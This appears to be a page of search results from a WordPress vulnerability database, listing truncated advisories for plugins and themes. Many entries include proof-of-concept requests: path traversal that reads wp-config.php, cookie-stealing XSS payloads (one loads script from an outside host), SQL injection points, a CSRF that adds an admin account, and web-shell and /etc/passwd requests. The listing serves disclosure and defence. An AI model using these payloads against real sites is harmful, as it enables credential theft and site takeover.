4359 matches found
Aspose.Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
The Aspose.Words Exporter WordPress plugin was affected by an Arbitrary File Download security vulnerability. The asposedocexporterdownload.php file of the plugin does not restrict access, check permission or validate the file parameter, allowing unauthenticated user to download any file from the...
Aspose Cloud eBook Generator - File Download
The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/aspose-cloud-ebook-generator/asposepostsexporterdownload.php?file=../../../wp-config.php...
Ptengine <= 1.0.1 - Reflected Cross-Site Scripting (XSS)
The ptengine-real-time-web-analytics-and-heatmap WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...
Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User
The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery CSRF Add User security vulnerability. This will register an administrator with username "xADMIN" and password "xPASS": POST request to:...
MiwoFTP - File & Folder Manager <= 1.0.4 - Arbitrary File Disclosure
A hook is added to ‘init’ in the file ‘miwoftp/miwoftp.php’. This hook is triggered whenever a user visits the front end of the site. The function specified in this hook will proceed to allow the user to download a file within the scope of the home directory of the site. Various values from the G...
Fraction Theme < 1.1.2 - Privilege Escalation
This vulnerability allows an attacker either authenticated or unauthenticated to escalate privileges on the site and have an admin account which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...
Photocrati Theme 4.x.x - SQL Injection
http://www.example.com/wp-content/themes/photocrati-theme-path/ecomm-sizes.php?prodid=SQL...
Quasar Theme Rock Form Builder plugin - Privilege Escalation
The Rock Form Builder plugin 1.0 is used within the Quasar WooCommerce theme 1.9.1. Authenticated users can modify WordPress settings which can lead to full site compromise. It's unclear which exact version of the rock-form-builder fixed the issue, but it was something in between 1.0 and 2.5, so...
WordPress Uninstall <= 1.1 - WordPress Deletion via CSRF
Any registered user can delete all WordPress database tables and files. This request makes it possible: http://wp.dev/wp-admin/admin-ajax.php?action=uninstall...
Wordpress Video Gallery <= 2.7 - SQL Injection
The contus-video-gallery WordPress plugin was affected by a SQL Injection security vulnerability. http://example.com/wp-admin/admin-ajax.php?action=rss&type=video&vid=SQLi...
PowerPress Podcasting < 6.0.1 - Cross-Site Scripting (XSS)
The PowerPress Podcasting plugin by Blubrry WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. /wp-admin/admin.php?page=powerpress/powerpressadmincategoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--alert0x014068...
WPtouch <= 3.6.6 - Unvalidated Open Redirect
The WPtouch WordPress plugin was affected by an Unvalidated Open Redirect security vulnerability. http://www.example.com/?wptouchswitch=mobile&redirect=http%3A%2F%2Fdomain.com...
Photo Gallery <= 1.2.8 - Multiple Authenticated Reflected XSS
The Photo Gallery by 10Web – Mobile-Friendly Image Gallery WordPress plugin was affected by a Multiple Authenticated Reflected XSS security vulnerability. /wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg,jpeg,png,gif&callback=bwgaddpreviewimage&sortby=name";alert1...
Feedweb 2.4.1-3.0.6 - SQL Injection
The feedweb WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/feedweb/widgetcontainer.php?pid= Inject here &ishp=true...
GI-Media Library <= 2.2.2 - Arbitrary File Download
The gi-media-library WordPress plugin was affected by an Arbitrary File Download security vulnerability. /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== Where "Li4vLi4vLi4vd3AtY29uZmlnLnBocA==" is "../../../wp-config.php" Base64 encoded...
Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/?pageid=0&&errorsfu-disallowed-mime-type0name=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E...
SEO Redirection < 2.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The plugin did not sanitise the referer link from requests before displaying them in the 'Settings SEO Redirection Redirection History' page. This result in a Store dCross-Site Scripting XSS issue This cURL request to a redirected page with a custom referer makes it possible: curl -H 'Referer:...
ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php...
Wordpress CodeArt Google MP3 Player - File Disclosure
The google-mp3-audio-player WordPress plugin was affected by a File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/google-mp3-audio-player/directdownload.php?file=../../../wp-config.php...
WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
" onmouseover="alert'hello';"...
CM Download Manager <= 2.0.0 - Unauthenticated Code Injection
The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server GET /cmdownloads/?CMDsearch=".phpinfo." HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Windows NT 6.3; WOW64; rv:33.0...
Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal
v0.9.2 added a check to not allow direct access to the affected file. However the path traversal was not fixed Plugin has been closed from repository. Choose File to upload : Directory :...
NativeChurch Theme - Arbitrary File Download
Description The NativeChurch WordPress theme was affected by an Arbitrary File Download security vulnerability. https://example.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php...
WordPress 3.5-3.7.1 - XML-RPC Denial of Service
…...
KenBurner Slider - Unauthenticated Arbitrary File Download
The WordPress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability, which could allow an attacker to download the wp-config.php file and others. This issue has been spotted being exploited in the wild...
wp-FileManager <= 1.3.0 - File Download
The wp-filemanager WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download...
WordPress 2.1.1 - Command Execution Backdoor
http://www.example.com/wp-includes/feed.php?ix=phpinfo; http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd...
Real Estate by Templatic - CSRF File Upload
Description The realestate WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/Realestate/images/tmp/yourshell.php...
Specialist by Templatic - CSRF File Upload
The specialist WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/specialist/images/tmp/yourshell.php...
slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard
The SlideDeck 2 Lite Responsive Content Slider WordPress plugin was affected by a XSS in ZeroClipboard security vulnerability. /wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id="catcheif!self.aself.a=!alertdocument.cookie//&width&height...
BSK PDF Manager < 2.9.1 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not sanitise the view and cattitle POST parameter when creating or editing a category /wp-admin/admin.php?page=bsk-pdf-manager, allowing authenticated users with a role as low as editor to set an XSS payload which will be triggered in the Categories list...
5star by Templatic - CSRF File Upload
Description The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/5star/images/tmp/yourshell.php...
BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections
The plugin did not use prepared statement with the categoryid and pdfid parameter when viewing the /wp-admin/admin.php?page=bsk-pdf-manager and /wp-admin/admin.php?page=bsk-pdf-manager-pdfs page leading to Authenticated SQL Injection issues...
Dailydeal by Templatic - CSRF File Upload
The dailydeal WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/dailydeal/images/tmp/yourshell.php...
Nightlife by Templatic - CSRF File Upload
The nightlife WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/nightlife/images/tmp/yourshell.php...
Video Posts Webcam Recorder < 1.55.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Video Posts Webcam Recorder WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. https://example.com/wp-content/plugins/video-posts-webcam-recorder/posts/videowhisper/rlogout.php?message=message'//...
Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php Local File Inclusion
The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php...
Tera Charts 0.1 - Unauthenticated Remote Path Traversal File Disclosure
The tera-charts WordPress plugin was affected by an Unauthenticated Remote Path Traversal File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php...
Ruven Toolkit <= 1.1 - tinymce/popup.php popup Parameter Reflected XSS
The ruven-toolkit WordPress plugin was affected by a tinymce/popup.php popup Parameter Reflected XSS security vulnerability. http://localhost/wp-content/plugins/ruven-toolkit/tinymce/popup.php?popup=popup'alertdocument.cookie&...
WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?apiurl=apiurl%27%3E%3Cscript%3Ealert%284%29%3C/script%3E...
Prostore < 1.1.3 - Open Redirection
The prostore WordPress theme was affected by an Open Redirection security vulnerability. /wp-content/themes/prostore/go.php?https://example.com...
Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...
Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpiedebug.php?url=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E...
Podcast Channels < 0.28 - Unauthenticated Reflected XSS
The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://127.0.0.1/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability...
WP Planet <= 0.1 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/wp–planet/rss.class/scripts/magpiedebug.php?url=alert1...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...
Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...
WP e-Commerce Swipe <= 3.1.0 - Multiple XSS Issues
The last time it was checked the plugin was still affected and had been closed...